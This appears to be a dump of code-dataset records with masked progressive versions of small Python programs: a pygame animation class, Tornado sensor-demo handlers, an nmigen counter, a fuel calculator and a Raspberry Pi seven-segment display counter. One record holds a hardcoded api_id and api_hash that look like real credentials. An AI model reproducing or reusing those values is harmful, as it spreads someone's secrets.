self.frame = (self.frame + 1) % (24 * ANIMATION_RATE) # reset > 20 sec
self.next_frame += self.frame_time
return self.frame
|
normal
|
{
"blob_id": "0b36bf9ac7887101be5503a0edce19e1111e5ca0",
"index": 6607,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Animation:\n\n def __init__(self):\n self.next_frame = pygame.time.get_ticks()\n self.frame = 0\n self.frame_time = 1000 // ANIMATION_RATE\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Animation:\n\n def __init__(self):\n self.next_frame = pygame.time.get_ticks()\n self.frame = 0\n self.frame_time = 1000 // ANIMATION_RATE\n\n def anim_sprite(self):\n if pygame.time.get_ticks() > self.next_frame:\n self.frame = (self.frame + 1) % (24 * ANIMATION_RATE)\n self.next_frame += self.frame_time\n return self.frame\n",
"step-4": "from zelda_utilities.constants import *\n\n\nclass Animation:\n\n def __init__(self):\n self.next_frame = pygame.time.get_ticks()\n self.frame = 0\n self.frame_time = 1000 // ANIMATION_RATE\n\n def anim_sprite(self):\n if pygame.time.get_ticks() > self.next_frame:\n self.frame = (self.frame + 1) % (24 * ANIMATION_RATE)\n self.next_frame += self.frame_time\n return self.frame\n",
"step-5": "# Import other modules\nfrom zelda_utilities.constants import *\n\n\n# Helps establish the current frame for sprite animation/image changing\nclass Animation:\n def __init__(self):\n # Animation clock\n self.next_frame = pygame.time.get_ticks()\n\n # Starting frame\n self.frame = 0\n\n # ~12 frames/sec (1000ms // 12)\n self.frame_time = 1000 // ANIMATION_RATE\n\n def anim_sprite(self):\n if pygame.time.get_ticks() > self.next_frame:\n self.frame = (self.frame + 1) % (24 * ANIMATION_RATE) # reset > 20 sec\n self.next_frame += self.frame_time\n return self.frame\n\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
api_id = "2168275"
api_hash = "e011a9cb95b7e7e153aa5840985fc883"
|
normal
|
{
"blob_id": "c6d6fcc242e1b63104a3f3eb788880635257ff4c",
"index": 7503,
"step-1": "<mask token>\n",
"step-2": "api_id = '2168275'\napi_hash = 'e011a9cb95b7e7e153aa5840985fc883'\n",
"step-3": "api_id = \"2168275\"\napi_hash = \"e011a9cb95b7e7e153aa5840985fc883\"\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
class UIHBarrier(UIHandler):
<|reserved_special_token_0|>
class UIWBDetector(UIHandler):
def get(self, *args, **kwargs):
template_args = self.get_template_args()
template_args['demo_title'] = 'Détecteur noir/blanc'
self.render(os.path.join(self.application.template_home,
'bwdetector.html'), **template_args)
class UIColorDetector(UIHandler):
def get(self, *args, **kwargs):
template_args = self.get_template_args()
template_args['demo_title'] = 'Détecteur couleur'
self.render(os.path.join(self.application.template_home,
'colordetector.html'), **template_args)
class UICalibration(UIHandler):
def get(self, *args, **kwargs):
template_args = self.get_template_args()
template_args['calibration_cfg'
] = self.application.controller.get_calibration_cfg_as_dict()
self.render(os.path.join(self.application.template_home,
'calibration.html'), **template_args)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class UIHandler(RequestHandler):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class UIHome(UIHandler):
def get(self, *args, **kwargs):
self.render(os.path.join(self.application.template_home,
'home.html'), **self.get_template_args())
class UIHBarrier(UIHandler):
def get(self, *args, **kwargs):
template_args = self.get_template_args()
template_args['demo_title'] = 'Barrière optique'
self.render(os.path.join(self.application.template_home,
'barrier.html'), **template_args)
class UIWBDetector(UIHandler):
def get(self, *args, **kwargs):
template_args = self.get_template_args()
template_args['demo_title'] = 'Détecteur noir/blanc'
self.render(os.path.join(self.application.template_home,
'bwdetector.html'), **template_args)
class UIColorDetector(UIHandler):
def get(self, *args, **kwargs):
template_args = self.get_template_args()
template_args['demo_title'] = 'Détecteur couleur'
self.render(os.path.join(self.application.template_home,
'colordetector.html'), **template_args)
class UICalibration(UIHandler):
def get(self, *args, **kwargs):
template_args = self.get_template_args()
template_args['calibration_cfg'
] = self.application.controller.get_calibration_cfg_as_dict()
self.render(os.path.join(self.application.template_home,
'calibration.html'), **template_args)
<|reserved_special_token_1|>
__author__ = 'Eric Pascual'
<|reserved_special_token_0|>
class UIHandler(RequestHandler):
def get_template_args(self):
return {'app_title': 'Capteurs de lumière et de couleur'}
def get(self, *args, **kwargs):
""" By default, the get method displays the "Not yet implemented message".
"""
self.render(os.path.join(self.application.template_home, 'nyi.html'
), **self.get_template_args())
class UIHome(UIHandler):
def get(self, *args, **kwargs):
self.render(os.path.join(self.application.template_home,
'home.html'), **self.get_template_args())
class UIHBarrier(UIHandler):
def get(self, *args, **kwargs):
template_args = self.get_template_args()
template_args['demo_title'] = 'Barrière optique'
self.render(os.path.join(self.application.template_home,
'barrier.html'), **template_args)
class UIWBDetector(UIHandler):
def get(self, *args, **kwargs):
template_args = self.get_template_args()
template_args['demo_title'] = 'Détecteur noir/blanc'
self.render(os.path.join(self.application.template_home,
'bwdetector.html'), **template_args)
class UIColorDetector(UIHandler):
def get(self, *args, **kwargs):
template_args = self.get_template_args()
template_args['demo_title'] = 'Détecteur couleur'
self.render(os.path.join(self.application.template_home,
'colordetector.html'), **template_args)
class UICalibration(UIHandler):
def get(self, *args, **kwargs):
template_args = self.get_template_args()
template_args['calibration_cfg'
] = self.application.controller.get_calibration_cfg_as_dict()
self.render(os.path.join(self.application.template_home,
'calibration.html'), **template_args)
<|reserved_special_token_1|>
__author__ = 'Eric Pascual'
from tornado.web import RequestHandler
import os
class UIHandler(RequestHandler):
def get_template_args(self):
return {'app_title': 'Capteurs de lumière et de couleur'}
def get(self, *args, **kwargs):
""" By default, the get method displays the "Not yet implemented message".
"""
self.render(os.path.join(self.application.template_home, 'nyi.html'
), **self.get_template_args())
class UIHome(UIHandler):
def get(self, *args, **kwargs):
self.render(os.path.join(self.application.template_home,
'home.html'), **self.get_template_args())
class UIHBarrier(UIHandler):
def get(self, *args, **kwargs):
template_args = self.get_template_args()
template_args['demo_title'] = 'Barrière optique'
self.render(os.path.join(self.application.template_home,
'barrier.html'), **template_args)
class UIWBDetector(UIHandler):
def get(self, *args, **kwargs):
template_args = self.get_template_args()
template_args['demo_title'] = 'Détecteur noir/blanc'
self.render(os.path.join(self.application.template_home,
'bwdetector.html'), **template_args)
class UIColorDetector(UIHandler):
def get(self, *args, **kwargs):
template_args = self.get_template_args()
template_args['demo_title'] = 'Détecteur couleur'
self.render(os.path.join(self.application.template_home,
'colordetector.html'), **template_args)
class UICalibration(UIHandler):
def get(self, *args, **kwargs):
template_args = self.get_template_args()
template_args['calibration_cfg'
] = self.application.controller.get_calibration_cfg_as_dict()
self.render(os.path.join(self.application.template_home,
'calibration.html'), **template_args)
<|reserved_special_token_1|>
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'Eric Pascual'
from tornado.web import RequestHandler
import os
class UIHandler(RequestHandler):
def get_template_args(self):
return {
'app_title':"Capteurs de lumière et de couleur"
}
def get(self, *args, **kwargs):
""" By default, the get method displays the "Not yet implemented message".
"""
self.render(
os.path.join(self.application.template_home, "nyi.html"),
**self.get_template_args()
)
class UIHome(UIHandler):
def get(self, *args, **kwargs):
self.render(
os.path.join(self.application.template_home, "home.html"),
**self.get_template_args()
)
class UIHBarrier(UIHandler):
def get(self, *args, **kwargs):
template_args = self.get_template_args()
template_args['demo_title'] = "Barrière optique"
self.render(
os.path.join(self.application.template_home, "barrier.html"),
**template_args
)
class UIWBDetector(UIHandler):
def get(self, *args, **kwargs):
template_args = self.get_template_args()
template_args['demo_title'] = "Détecteur noir/blanc"
self.render(
os.path.join(self.application.template_home, "bwdetector.html"),
**template_args
)
class UIColorDetector(UIHandler):
def get(self, *args, **kwargs):
template_args = self.get_template_args()
template_args['demo_title'] = "Détecteur couleur"
self.render(
os.path.join(self.application.template_home, "colordetector.html"),
**template_args
)
class UICalibration(UIHandler):
def get(self, *args, **kwargs):
template_args = self.get_template_args()
template_args["calibration_cfg"] = self.application.controller.get_calibration_cfg_as_dict()
self.render(
os.path.join(self.application.template_home, "calibration.html"),
**template_args
)
|
flexible
|
{
"blob_id": "b13d4b0ccb693fb97befb4ee47974d8ee076b52b",
"index": 5177,
"step-1": "<mask token>\n\n\nclass UIHBarrier(UIHandler):\n <mask token>\n\n\nclass UIWBDetector(UIHandler):\n\n def get(self, *args, **kwargs):\n template_args = self.get_template_args()\n template_args['demo_title'] = 'Détecteur noir/blanc'\n self.render(os.path.join(self.application.template_home,\n 'bwdetector.html'), **template_args)\n\n\nclass UIColorDetector(UIHandler):\n\n def get(self, *args, **kwargs):\n template_args = self.get_template_args()\n template_args['demo_title'] = 'Détecteur couleur'\n self.render(os.path.join(self.application.template_home,\n 'colordetector.html'), **template_args)\n\n\nclass UICalibration(UIHandler):\n\n def get(self, *args, **kwargs):\n template_args = self.get_template_args()\n template_args['calibration_cfg'\n ] = self.application.controller.get_calibration_cfg_as_dict()\n self.render(os.path.join(self.application.template_home,\n 'calibration.html'), **template_args)\n",
"step-2": "<mask token>\n\n\nclass UIHandler(RequestHandler):\n <mask token>\n <mask token>\n\n\nclass UIHome(UIHandler):\n\n def get(self, *args, **kwargs):\n self.render(os.path.join(self.application.template_home,\n 'home.html'), **self.get_template_args())\n\n\nclass UIHBarrier(UIHandler):\n\n def get(self, *args, **kwargs):\n template_args = self.get_template_args()\n template_args['demo_title'] = 'Barrière optique'\n self.render(os.path.join(self.application.template_home,\n 'barrier.html'), **template_args)\n\n\nclass UIWBDetector(UIHandler):\n\n def get(self, *args, **kwargs):\n template_args = self.get_template_args()\n template_args['demo_title'] = 'Détecteur noir/blanc'\n self.render(os.path.join(self.application.template_home,\n 'bwdetector.html'), **template_args)\n\n\nclass UIColorDetector(UIHandler):\n\n def get(self, *args, **kwargs):\n template_args = self.get_template_args()\n template_args['demo_title'] = 'Détecteur couleur'\n self.render(os.path.join(self.application.template_home,\n 'colordetector.html'), **template_args)\n\n\nclass UICalibration(UIHandler):\n\n def get(self, *args, **kwargs):\n template_args = self.get_template_args()\n template_args['calibration_cfg'\n ] = self.application.controller.get_calibration_cfg_as_dict()\n self.render(os.path.join(self.application.template_home,\n 'calibration.html'), **template_args)\n",
"step-3": "__author__ = 'Eric Pascual'\n<mask token>\n\n\nclass UIHandler(RequestHandler):\n\n def get_template_args(self):\n return {'app_title': 'Capteurs de lumière et de couleur'}\n\n def get(self, *args, **kwargs):\n \"\"\" By default, the get method displays the \"Not yet implemented message\".\n \"\"\"\n self.render(os.path.join(self.application.template_home, 'nyi.html'\n ), **self.get_template_args())\n\n\nclass UIHome(UIHandler):\n\n def get(self, *args, **kwargs):\n self.render(os.path.join(self.application.template_home,\n 'home.html'), **self.get_template_args())\n\n\nclass UIHBarrier(UIHandler):\n\n def get(self, *args, **kwargs):\n template_args = self.get_template_args()\n template_args['demo_title'] = 'Barrière optique'\n self.render(os.path.join(self.application.template_home,\n 'barrier.html'), **template_args)\n\n\nclass UIWBDetector(UIHandler):\n\n def get(self, *args, **kwargs):\n template_args = self.get_template_args()\n template_args['demo_title'] = 'Détecteur noir/blanc'\n self.render(os.path.join(self.application.template_home,\n 'bwdetector.html'), **template_args)\n\n\nclass UIColorDetector(UIHandler):\n\n def get(self, *args, **kwargs):\n template_args = self.get_template_args()\n template_args['demo_title'] = 'Détecteur couleur'\n self.render(os.path.join(self.application.template_home,\n 'colordetector.html'), **template_args)\n\n\nclass UICalibration(UIHandler):\n\n def get(self, *args, **kwargs):\n template_args = self.get_template_args()\n template_args['calibration_cfg'\n ] = self.application.controller.get_calibration_cfg_as_dict()\n self.render(os.path.join(self.application.template_home,\n 'calibration.html'), **template_args)\n",
"step-4": "__author__ = 'Eric Pascual'\nfrom tornado.web import RequestHandler\nimport os\n\n\nclass UIHandler(RequestHandler):\n\n def get_template_args(self):\n return {'app_title': 'Capteurs de lumière et de couleur'}\n\n def get(self, *args, **kwargs):\n \"\"\" By default, the get method displays the \"Not yet implemented message\".\n \"\"\"\n self.render(os.path.join(self.application.template_home, 'nyi.html'\n ), **self.get_template_args())\n\n\nclass UIHome(UIHandler):\n\n def get(self, *args, **kwargs):\n self.render(os.path.join(self.application.template_home,\n 'home.html'), **self.get_template_args())\n\n\nclass UIHBarrier(UIHandler):\n\n def get(self, *args, **kwargs):\n template_args = self.get_template_args()\n template_args['demo_title'] = 'Barrière optique'\n self.render(os.path.join(self.application.template_home,\n 'barrier.html'), **template_args)\n\n\nclass UIWBDetector(UIHandler):\n\n def get(self, *args, **kwargs):\n template_args = self.get_template_args()\n template_args['demo_title'] = 'Détecteur noir/blanc'\n self.render(os.path.join(self.application.template_home,\n 'bwdetector.html'), **template_args)\n\n\nclass UIColorDetector(UIHandler):\n\n def get(self, *args, **kwargs):\n template_args = self.get_template_args()\n template_args['demo_title'] = 'Détecteur couleur'\n self.render(os.path.join(self.application.template_home,\n 'colordetector.html'), **template_args)\n\n\nclass UICalibration(UIHandler):\n\n def get(self, *args, **kwargs):\n template_args = self.get_template_args()\n template_args['calibration_cfg'\n ] = self.application.controller.get_calibration_cfg_as_dict()\n self.render(os.path.join(self.application.template_home,\n 'calibration.html'), **template_args)\n",
"step-5": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__author__ = 'Eric Pascual'\n\nfrom tornado.web import RequestHandler\nimport os\n\nclass UIHandler(RequestHandler):\n def get_template_args(self):\n return {\n 'app_title':\"Capteurs de lumière et de couleur\"\n }\n\n def get(self, *args, **kwargs):\n \"\"\" By default, the get method displays the \"Not yet implemented message\".\n \"\"\"\n self.render(\n os.path.join(self.application.template_home, \"nyi.html\"),\n **self.get_template_args()\n )\n\n\nclass UIHome(UIHandler):\n def get(self, *args, **kwargs):\n self.render(\n os.path.join(self.application.template_home, \"home.html\"),\n **self.get_template_args()\n )\n\n\nclass UIHBarrier(UIHandler):\n def get(self, *args, **kwargs):\n template_args = self.get_template_args()\n template_args['demo_title'] = \"Barrière optique\"\n\n self.render(\n os.path.join(self.application.template_home, \"barrier.html\"),\n **template_args\n )\n\n\nclass UIWBDetector(UIHandler):\n def get(self, *args, **kwargs):\n template_args = self.get_template_args()\n template_args['demo_title'] = \"Détecteur noir/blanc\"\n\n self.render(\n os.path.join(self.application.template_home, \"bwdetector.html\"),\n **template_args\n )\n\n\nclass UIColorDetector(UIHandler):\n def get(self, *args, **kwargs):\n template_args = self.get_template_args()\n template_args['demo_title'] = \"Détecteur couleur\"\n\n self.render(\n os.path.join(self.application.template_home, \"colordetector.html\"),\n **template_args\n )\n\n\nclass UICalibration(UIHandler):\n def get(self, *args, **kwargs):\n template_args = self.get_template_args()\n template_args[\"calibration_cfg\"] = self.application.controller.get_calibration_cfg_as_dict()\n self.render(\n os.path.join(self.application.template_home, \"calibration.html\"),\n **template_args\n )\n\n\n",
"step-ids": [
7,
11,
14,
15,
16
]
}
|
[
7,
11,
14,
15,
16
] |
from nmigen import *
class Top(Elaboratable):
def __init__(self):
self.counter = Signal(3)
self.led = Signal()
def elaborate(self, platform):
m = Module()
m.d.comb += self.led.eq(self.counter[2])
m.d.sync += self.counter.eq(self.counter + 1)
return m
|
normal
|
{
"blob_id": "22b6ea64cdb109e1c6b2536b50935d09d37a7e1a",
"index": 3057,
"step-1": "<mask token>\n\n\nclass Top(Elaboratable):\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Top(Elaboratable):\n <mask token>\n\n def elaborate(self, platform):\n m = Module()\n m.d.comb += self.led.eq(self.counter[2])\n m.d.sync += self.counter.eq(self.counter + 1)\n return m\n",
"step-3": "<mask token>\n\n\nclass Top(Elaboratable):\n\n def __init__(self):\n self.counter = Signal(3)\n self.led = Signal()\n\n def elaborate(self, platform):\n m = Module()\n m.d.comb += self.led.eq(self.counter[2])\n m.d.sync += self.counter.eq(self.counter + 1)\n return m\n",
"step-4": "from nmigen import *\n\n\nclass Top(Elaboratable):\n\n def __init__(self):\n self.counter = Signal(3)\n self.led = Signal()\n\n def elaborate(self, platform):\n m = Module()\n m.d.comb += self.led.eq(self.counter[2])\n m.d.sync += self.counter.eq(self.counter + 1)\n return m\n",
"step-5": null,
"step-ids": [
1,
2,
3,
4
]
}
|
[
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print(round(km / cg, 3), 'km/l')
<|reserved_special_token_1|>
km = float(input())
cg = float(input())
print(round(km / cg, 3), 'km/l')
<|reserved_special_token_1|>
km=float(input())
cg=float(input())
print(round(km/cg,3),"km/l")
|
flexible
|
{
"blob_id": "db33f7386d1eacbfbfd29aa367df310c557ae864",
"index": 8520,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(round(km / cg, 3), 'km/l')\n",
"step-3": "km = float(input())\ncg = float(input())\nprint(round(km / cg, 3), 'km/l')\n",
"step-4": "km=float(input())\ncg=float(input())\nprint(round(km/cg,3),\"km/l\")",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
def setupLed1():
for port in led1:
GPIO.setup(port[1], GPIO.OUT)
def setupLed2():
for port in led2:
GPIO.setup(port[1], GPIO.OUT)
def statusLed(port, status):
GPIO.output(port, status)
def turnOnAllLeds():
for led in led1:
statusLed(led[1], True)
for led in led2:
statusLed(led[1], True)
def turnOffAllLeds():
for led in led1:
statusLed(led[1], False)
for led in led2:
statusLed(led[1], False)
def turnOffOneLed(led):
for port in led:
statusLed(port[1], False)
<|reserved_special_token_0|>
def createNumber2Leds(led1, led2, number):
if number < 10:
createNumber(led1, 0)
createNumber(led2, number)
else:
decenas = number / 10
unidades = number % 10
createNumber(led1, decenas)
createNumber(led2, unidades)
def titileoNumber2Leds(led1, led2, number):
for i in range(3):
turnOffAllLeds()
time.sleep(0.25)
createNumber2Leds(led1, led2, number)
time.sleep(0.25)
def digiTurno():
contador = 0
titileoNumber2Leds(led1, led2, contador)
while True:
if GPIO.input(reset):
contador = 0
print('-' * 20 + ' RESET ' + '-' * 20)
print(datetime.now())
titileoNumber2Leds(led1, led2, contador)
print('Numero actual = ' + str(contador))
time.sleep(0.3)
if GPIO.input(more):
if contador < 99:
contador += 1
else:
print(datetime.now())
contador = 0
print('Numero actual = ' + str(contador))
createNumber2Leds(led1, led2, contador)
time.sleep(0.3)
if GPIO.input(minus):
if contador == 0:
contador = 99
else:
contador = contador - 1
print('Numero actual = ' + str(contador))
createNumber2Leds(led1, led2, contador)
time.sleep(0.3)
def main():
setupLed1()
setupLed2()
turnOffAllLeds()
try:
print('Presione un boton para continuar')
digiTurno()
except (KeyboardInterrupt, SystemExit):
GPIO.cleanup()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def setupLed1():
for port in led1:
GPIO.setup(port[1], GPIO.OUT)
def setupLed2():
for port in led2:
GPIO.setup(port[1], GPIO.OUT)
def statusLed(port, status):
GPIO.output(port, status)
def turnOnAllLeds():
for led in led1:
statusLed(led[1], True)
for led in led2:
statusLed(led[1], True)
def turnOffAllLeds():
for led in led1:
statusLed(led[1], False)
for led in led2:
statusLed(led[1], False)
def turnOffOneLed(led):
for port in led:
statusLed(port[1], False)
def createNumber(ledNumber, number):
turnOffOneLed(ledNumber)
for i in range(10):
if number == i:
for letter in numbers[i]:
for led in ledNumber:
if led[0] == letter:
statusLed(led[1], True)
def createNumber2Leds(led1, led2, number):
if number < 10:
createNumber(led1, 0)
createNumber(led2, number)
else:
decenas = number / 10
unidades = number % 10
createNumber(led1, decenas)
createNumber(led2, unidades)
def titileoNumber2Leds(led1, led2, number):
for i in range(3):
turnOffAllLeds()
time.sleep(0.25)
createNumber2Leds(led1, led2, number)
time.sleep(0.25)
def digiTurno():
contador = 0
titileoNumber2Leds(led1, led2, contador)
while True:
if GPIO.input(reset):
contador = 0
print('-' * 20 + ' RESET ' + '-' * 20)
print(datetime.now())
titileoNumber2Leds(led1, led2, contador)
print('Numero actual = ' + str(contador))
time.sleep(0.3)
if GPIO.input(more):
if contador < 99:
contador += 1
else:
print(datetime.now())
contador = 0
print('Numero actual = ' + str(contador))
createNumber2Leds(led1, led2, contador)
time.sleep(0.3)
if GPIO.input(minus):
if contador == 0:
contador = 99
else:
contador = contador - 1
print('Numero actual = ' + str(contador))
createNumber2Leds(led1, led2, contador)
time.sleep(0.3)
def main():
setupLed1()
setupLed2()
turnOffAllLeds()
try:
print('Presione un boton para continuar')
digiTurno()
except (KeyboardInterrupt, SystemExit):
GPIO.cleanup()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
GPIO.setmode(GPIO.BOARD)
GPIO.setwarnings(False)
GPIO.setup(reset, GPIO.IN)
GPIO.setup(minus, GPIO.IN)
GPIO.setup(more, GPIO.IN)
def setupLed1():
for port in led1:
GPIO.setup(port[1], GPIO.OUT)
def setupLed2():
for port in led2:
GPIO.setup(port[1], GPIO.OUT)
def statusLed(port, status):
GPIO.output(port, status)
def turnOnAllLeds():
for led in led1:
statusLed(led[1], True)
for led in led2:
statusLed(led[1], True)
def turnOffAllLeds():
for led in led1:
statusLed(led[1], False)
for led in led2:
statusLed(led[1], False)
def turnOffOneLed(led):
for port in led:
statusLed(port[1], False)
def createNumber(ledNumber, number):
turnOffOneLed(ledNumber)
for i in range(10):
if number == i:
for letter in numbers[i]:
for led in ledNumber:
if led[0] == letter:
statusLed(led[1], True)
def createNumber2Leds(led1, led2, number):
if number < 10:
createNumber(led1, 0)
createNumber(led2, number)
else:
decenas = number / 10
unidades = number % 10
createNumber(led1, decenas)
createNumber(led2, unidades)
def titileoNumber2Leds(led1, led2, number):
for i in range(3):
turnOffAllLeds()
time.sleep(0.25)
createNumber2Leds(led1, led2, number)
time.sleep(0.25)
def digiTurno():
contador = 0
titileoNumber2Leds(led1, led2, contador)
while True:
if GPIO.input(reset):
contador = 0
print('-' * 20 + ' RESET ' + '-' * 20)
print(datetime.now())
titileoNumber2Leds(led1, led2, contador)
print('Numero actual = ' + str(contador))
time.sleep(0.3)
if GPIO.input(more):
if contador < 99:
contador += 1
else:
print(datetime.now())
contador = 0
print('Numero actual = ' + str(contador))
createNumber2Leds(led1, led2, contador)
time.sleep(0.3)
if GPIO.input(minus):
if contador == 0:
contador = 99
else:
contador = contador - 1
print('Numero actual = ' + str(contador))
createNumber2Leds(led1, led2, contador)
time.sleep(0.3)
def main():
setupLed1()
setupLed2()
turnOffAllLeds()
try:
print('Presione un boton para continuar')
digiTurno()
except (KeyboardInterrupt, SystemExit):
GPIO.cleanup()
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
led1 = [('g', 40), ('f', 38), ('a', 36), ('b', 32), ('e', 26), ('d', 24), (
'c', 22)]
led2 = [('g', 19), ('f', 15), ('a', 13), ('b', 11), ('e', 7), ('d', 5), (
'c', 3)]
numbers = [('a', 'b', 'c', 'd', 'e', 'f'), ('b', 'c'), ('a', 'b', 'g', 'e',
'd'), ('a', 'b', 'g', 'c', 'd'), ('f', 'g', 'b', 'c'), ('a', 'f', 'g',
'c', 'd'), ('a', 'f', 'g', 'c', 'd', 'e'), ('a', 'b', 'c'), ('a', 'b',
'c', 'd', 'e', 'f', 'g'), ('a', 'b', 'c', 'd', 'f', 'g')]
reset = 12
minus = 16
more = 18
GPIO.setmode(GPIO.BOARD)
GPIO.setwarnings(False)
GPIO.setup(reset, GPIO.IN)
GPIO.setup(minus, GPIO.IN)
GPIO.setup(more, GPIO.IN)
def setupLed1():
for port in led1:
GPIO.setup(port[1], GPIO.OUT)
def setupLed2():
for port in led2:
GPIO.setup(port[1], GPIO.OUT)
def statusLed(port, status):
GPIO.output(port, status)
def turnOnAllLeds():
for led in led1:
statusLed(led[1], True)
for led in led2:
statusLed(led[1], True)
def turnOffAllLeds():
for led in led1:
statusLed(led[1], False)
for led in led2:
statusLed(led[1], False)
def turnOffOneLed(led):
for port in led:
statusLed(port[1], False)
def createNumber(ledNumber, number):
turnOffOneLed(ledNumber)
for i in range(10):
if number == i:
for letter in numbers[i]:
for led in ledNumber:
if led[0] == letter:
statusLed(led[1], True)
def createNumber2Leds(led1, led2, number):
if number < 10:
createNumber(led1, 0)
createNumber(led2, number)
else:
decenas = number / 10
unidades = number % 10
createNumber(led1, decenas)
createNumber(led2, unidades)
def titileoNumber2Leds(led1, led2, number):
for i in range(3):
turnOffAllLeds()
time.sleep(0.25)
createNumber2Leds(led1, led2, number)
time.sleep(0.25)
def digiTurno():
contador = 0
titileoNumber2Leds(led1, led2, contador)
while True:
if GPIO.input(reset):
contador = 0
print('-' * 20 + ' RESET ' + '-' * 20)
print(datetime.now())
titileoNumber2Leds(led1, led2, contador)
print('Numero actual = ' + str(contador))
time.sleep(0.3)
if GPIO.input(more):
if contador < 99:
contador += 1
else:
print(datetime.now())
contador = 0
print('Numero actual = ' + str(contador))
createNumber2Leds(led1, led2, contador)
time.sleep(0.3)
if GPIO.input(minus):
if contador == 0:
contador = 99
else:
contador = contador - 1
print('Numero actual = ' + str(contador))
createNumber2Leds(led1, led2, contador)
time.sleep(0.3)
def main():
setupLed1()
setupLed2()
turnOffAllLeds()
try:
print('Presione un boton para continuar')
digiTurno()
except (KeyboardInterrupt, SystemExit):
GPIO.cleanup()
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
import RPi.GPIO as GPIO
import time
from datetime import datetime
led1 = [('g', 40), ('f', 38), ('a', 36), ('b', 32),
('e', 26), ('d', 24), ('c', 22)]
led2 = [('g', 19), ('f', 15), ('a', 13),
('b', 11), ('e', 7), ('d', 5), ('c', 3)]
numbers = [
('a', 'b', 'c', 'd', 'e', 'f'),
('b', 'c'),
('a', 'b', 'g', 'e', 'd'),
('a', 'b', 'g', 'c', 'd'),
('f', 'g', 'b', 'c'),
('a', 'f', 'g', 'c', 'd'),
('a', 'f', 'g', 'c', 'd', 'e'),
('a', 'b', 'c'),
('a', 'b', 'c', 'd', 'e', 'f', 'g'),
('a', 'b', 'c', 'd', 'f', 'g')
]
reset = 12
minus = 16
more = 18
GPIO.setmode(GPIO.BOARD)
GPIO.setwarnings(False)
GPIO.setup(reset, GPIO.IN)
GPIO.setup(minus, GPIO.IN)
GPIO.setup(more, GPIO.IN)
def setupLed1():
for port in led1:
GPIO.setup(port[1], GPIO.OUT)
def setupLed2():
for port in led2:
GPIO.setup(port[1], GPIO.OUT)
def statusLed(port, status):
GPIO.output(port, status)
def turnOnAllLeds():
for led in led1:
statusLed(led[1], True)
for led in led2:
statusLed(led[1], True)
def turnOffAllLeds():
for led in led1:
statusLed(led[1], False)
for led in led2:
statusLed(led[1], False)
def turnOffOneLed(led):
for port in led:
statusLed(port[1], False)
def createNumber(ledNumber, number):
turnOffOneLed(ledNumber)
for i in range(10):
if number == i:
for letter in numbers[i]:
for led in ledNumber:
if led[0] == letter:
statusLed(led[1], True)
def createNumber2Leds(led1, led2, number):
if number < 10:
createNumber(led1, 0)
createNumber(led2, number)
else:
decenas = number / 10
unidades = number % 10
createNumber(led1, decenas)
createNumber(led2, unidades)
def titileoNumber2Leds(led1, led2, number):
for i in range(3):
turnOffAllLeds()
time.sleep(0.25)
createNumber2Leds(led1, led2, number)
time.sleep(0.25)
def digiTurno():
contador = 0
titileoNumber2Leds(led1, led2, contador)
while True:
if GPIO.input(reset):
contador = 0
print("-"*20+" RESET "+"-"*20)
print(datetime.now())
titileoNumber2Leds(led1, led2, contador)
print("Numero actual = "+str(contador))
time.sleep(.3)
if GPIO.input(more):
if contador < 99:
contador += 1
else:
print(datetime.now())
contador = 0
print("Numero actual = "+str(contador))
createNumber2Leds(led1, led2, contador)
time.sleep(.3)
if GPIO.input(minus):
if contador == 0:
contador = 99
else:
contador = contador-1
print("Numero actual = "+str(contador))
createNumber2Leds(led1, led2, contador)
time.sleep(.3)
def main():
    """Initialise both displays, blank them, and run the polling loop.

    Ctrl-C / SystemExit releases the GPIO pins via GPIO.cleanup().
    """
    setupLed1()
    setupLed2()
    turnOffAllLeds()
    try:
        print("Presione un boton para continuar")
        digiTurno()
    except (KeyboardInterrupt, SystemExit):
        GPIO.cleanup()


if __name__ == "__main__":
    main()
|
flexible
|
{
"blob_id": "0d022291f9ace02ef1ee5c462657ea6376a0e6a4",
"index": 9436,
"step-1": "<mask token>\n\n\ndef setupLed1():\n for port in led1:\n GPIO.setup(port[1], GPIO.OUT)\n\n\ndef setupLed2():\n for port in led2:\n GPIO.setup(port[1], GPIO.OUT)\n\n\ndef statusLed(port, status):\n GPIO.output(port, status)\n\n\ndef turnOnAllLeds():\n for led in led1:\n statusLed(led[1], True)\n for led in led2:\n statusLed(led[1], True)\n\n\ndef turnOffAllLeds():\n for led in led1:\n statusLed(led[1], False)\n for led in led2:\n statusLed(led[1], False)\n\n\ndef turnOffOneLed(led):\n for port in led:\n statusLed(port[1], False)\n\n\n<mask token>\n\n\ndef createNumber2Leds(led1, led2, number):\n if number < 10:\n createNumber(led1, 0)\n createNumber(led2, number)\n else:\n decenas = number / 10\n unidades = number % 10\n createNumber(led1, decenas)\n createNumber(led2, unidades)\n\n\ndef titileoNumber2Leds(led1, led2, number):\n for i in range(3):\n turnOffAllLeds()\n time.sleep(0.25)\n createNumber2Leds(led1, led2, number)\n time.sleep(0.25)\n\n\ndef digiTurno():\n contador = 0\n titileoNumber2Leds(led1, led2, contador)\n while True:\n if GPIO.input(reset):\n contador = 0\n print('-' * 20 + ' RESET ' + '-' * 20)\n print(datetime.now())\n titileoNumber2Leds(led1, led2, contador)\n print('Numero actual = ' + str(contador))\n time.sleep(0.3)\n if GPIO.input(more):\n if contador < 99:\n contador += 1\n else:\n print(datetime.now())\n contador = 0\n print('Numero actual = ' + str(contador))\n createNumber2Leds(led1, led2, 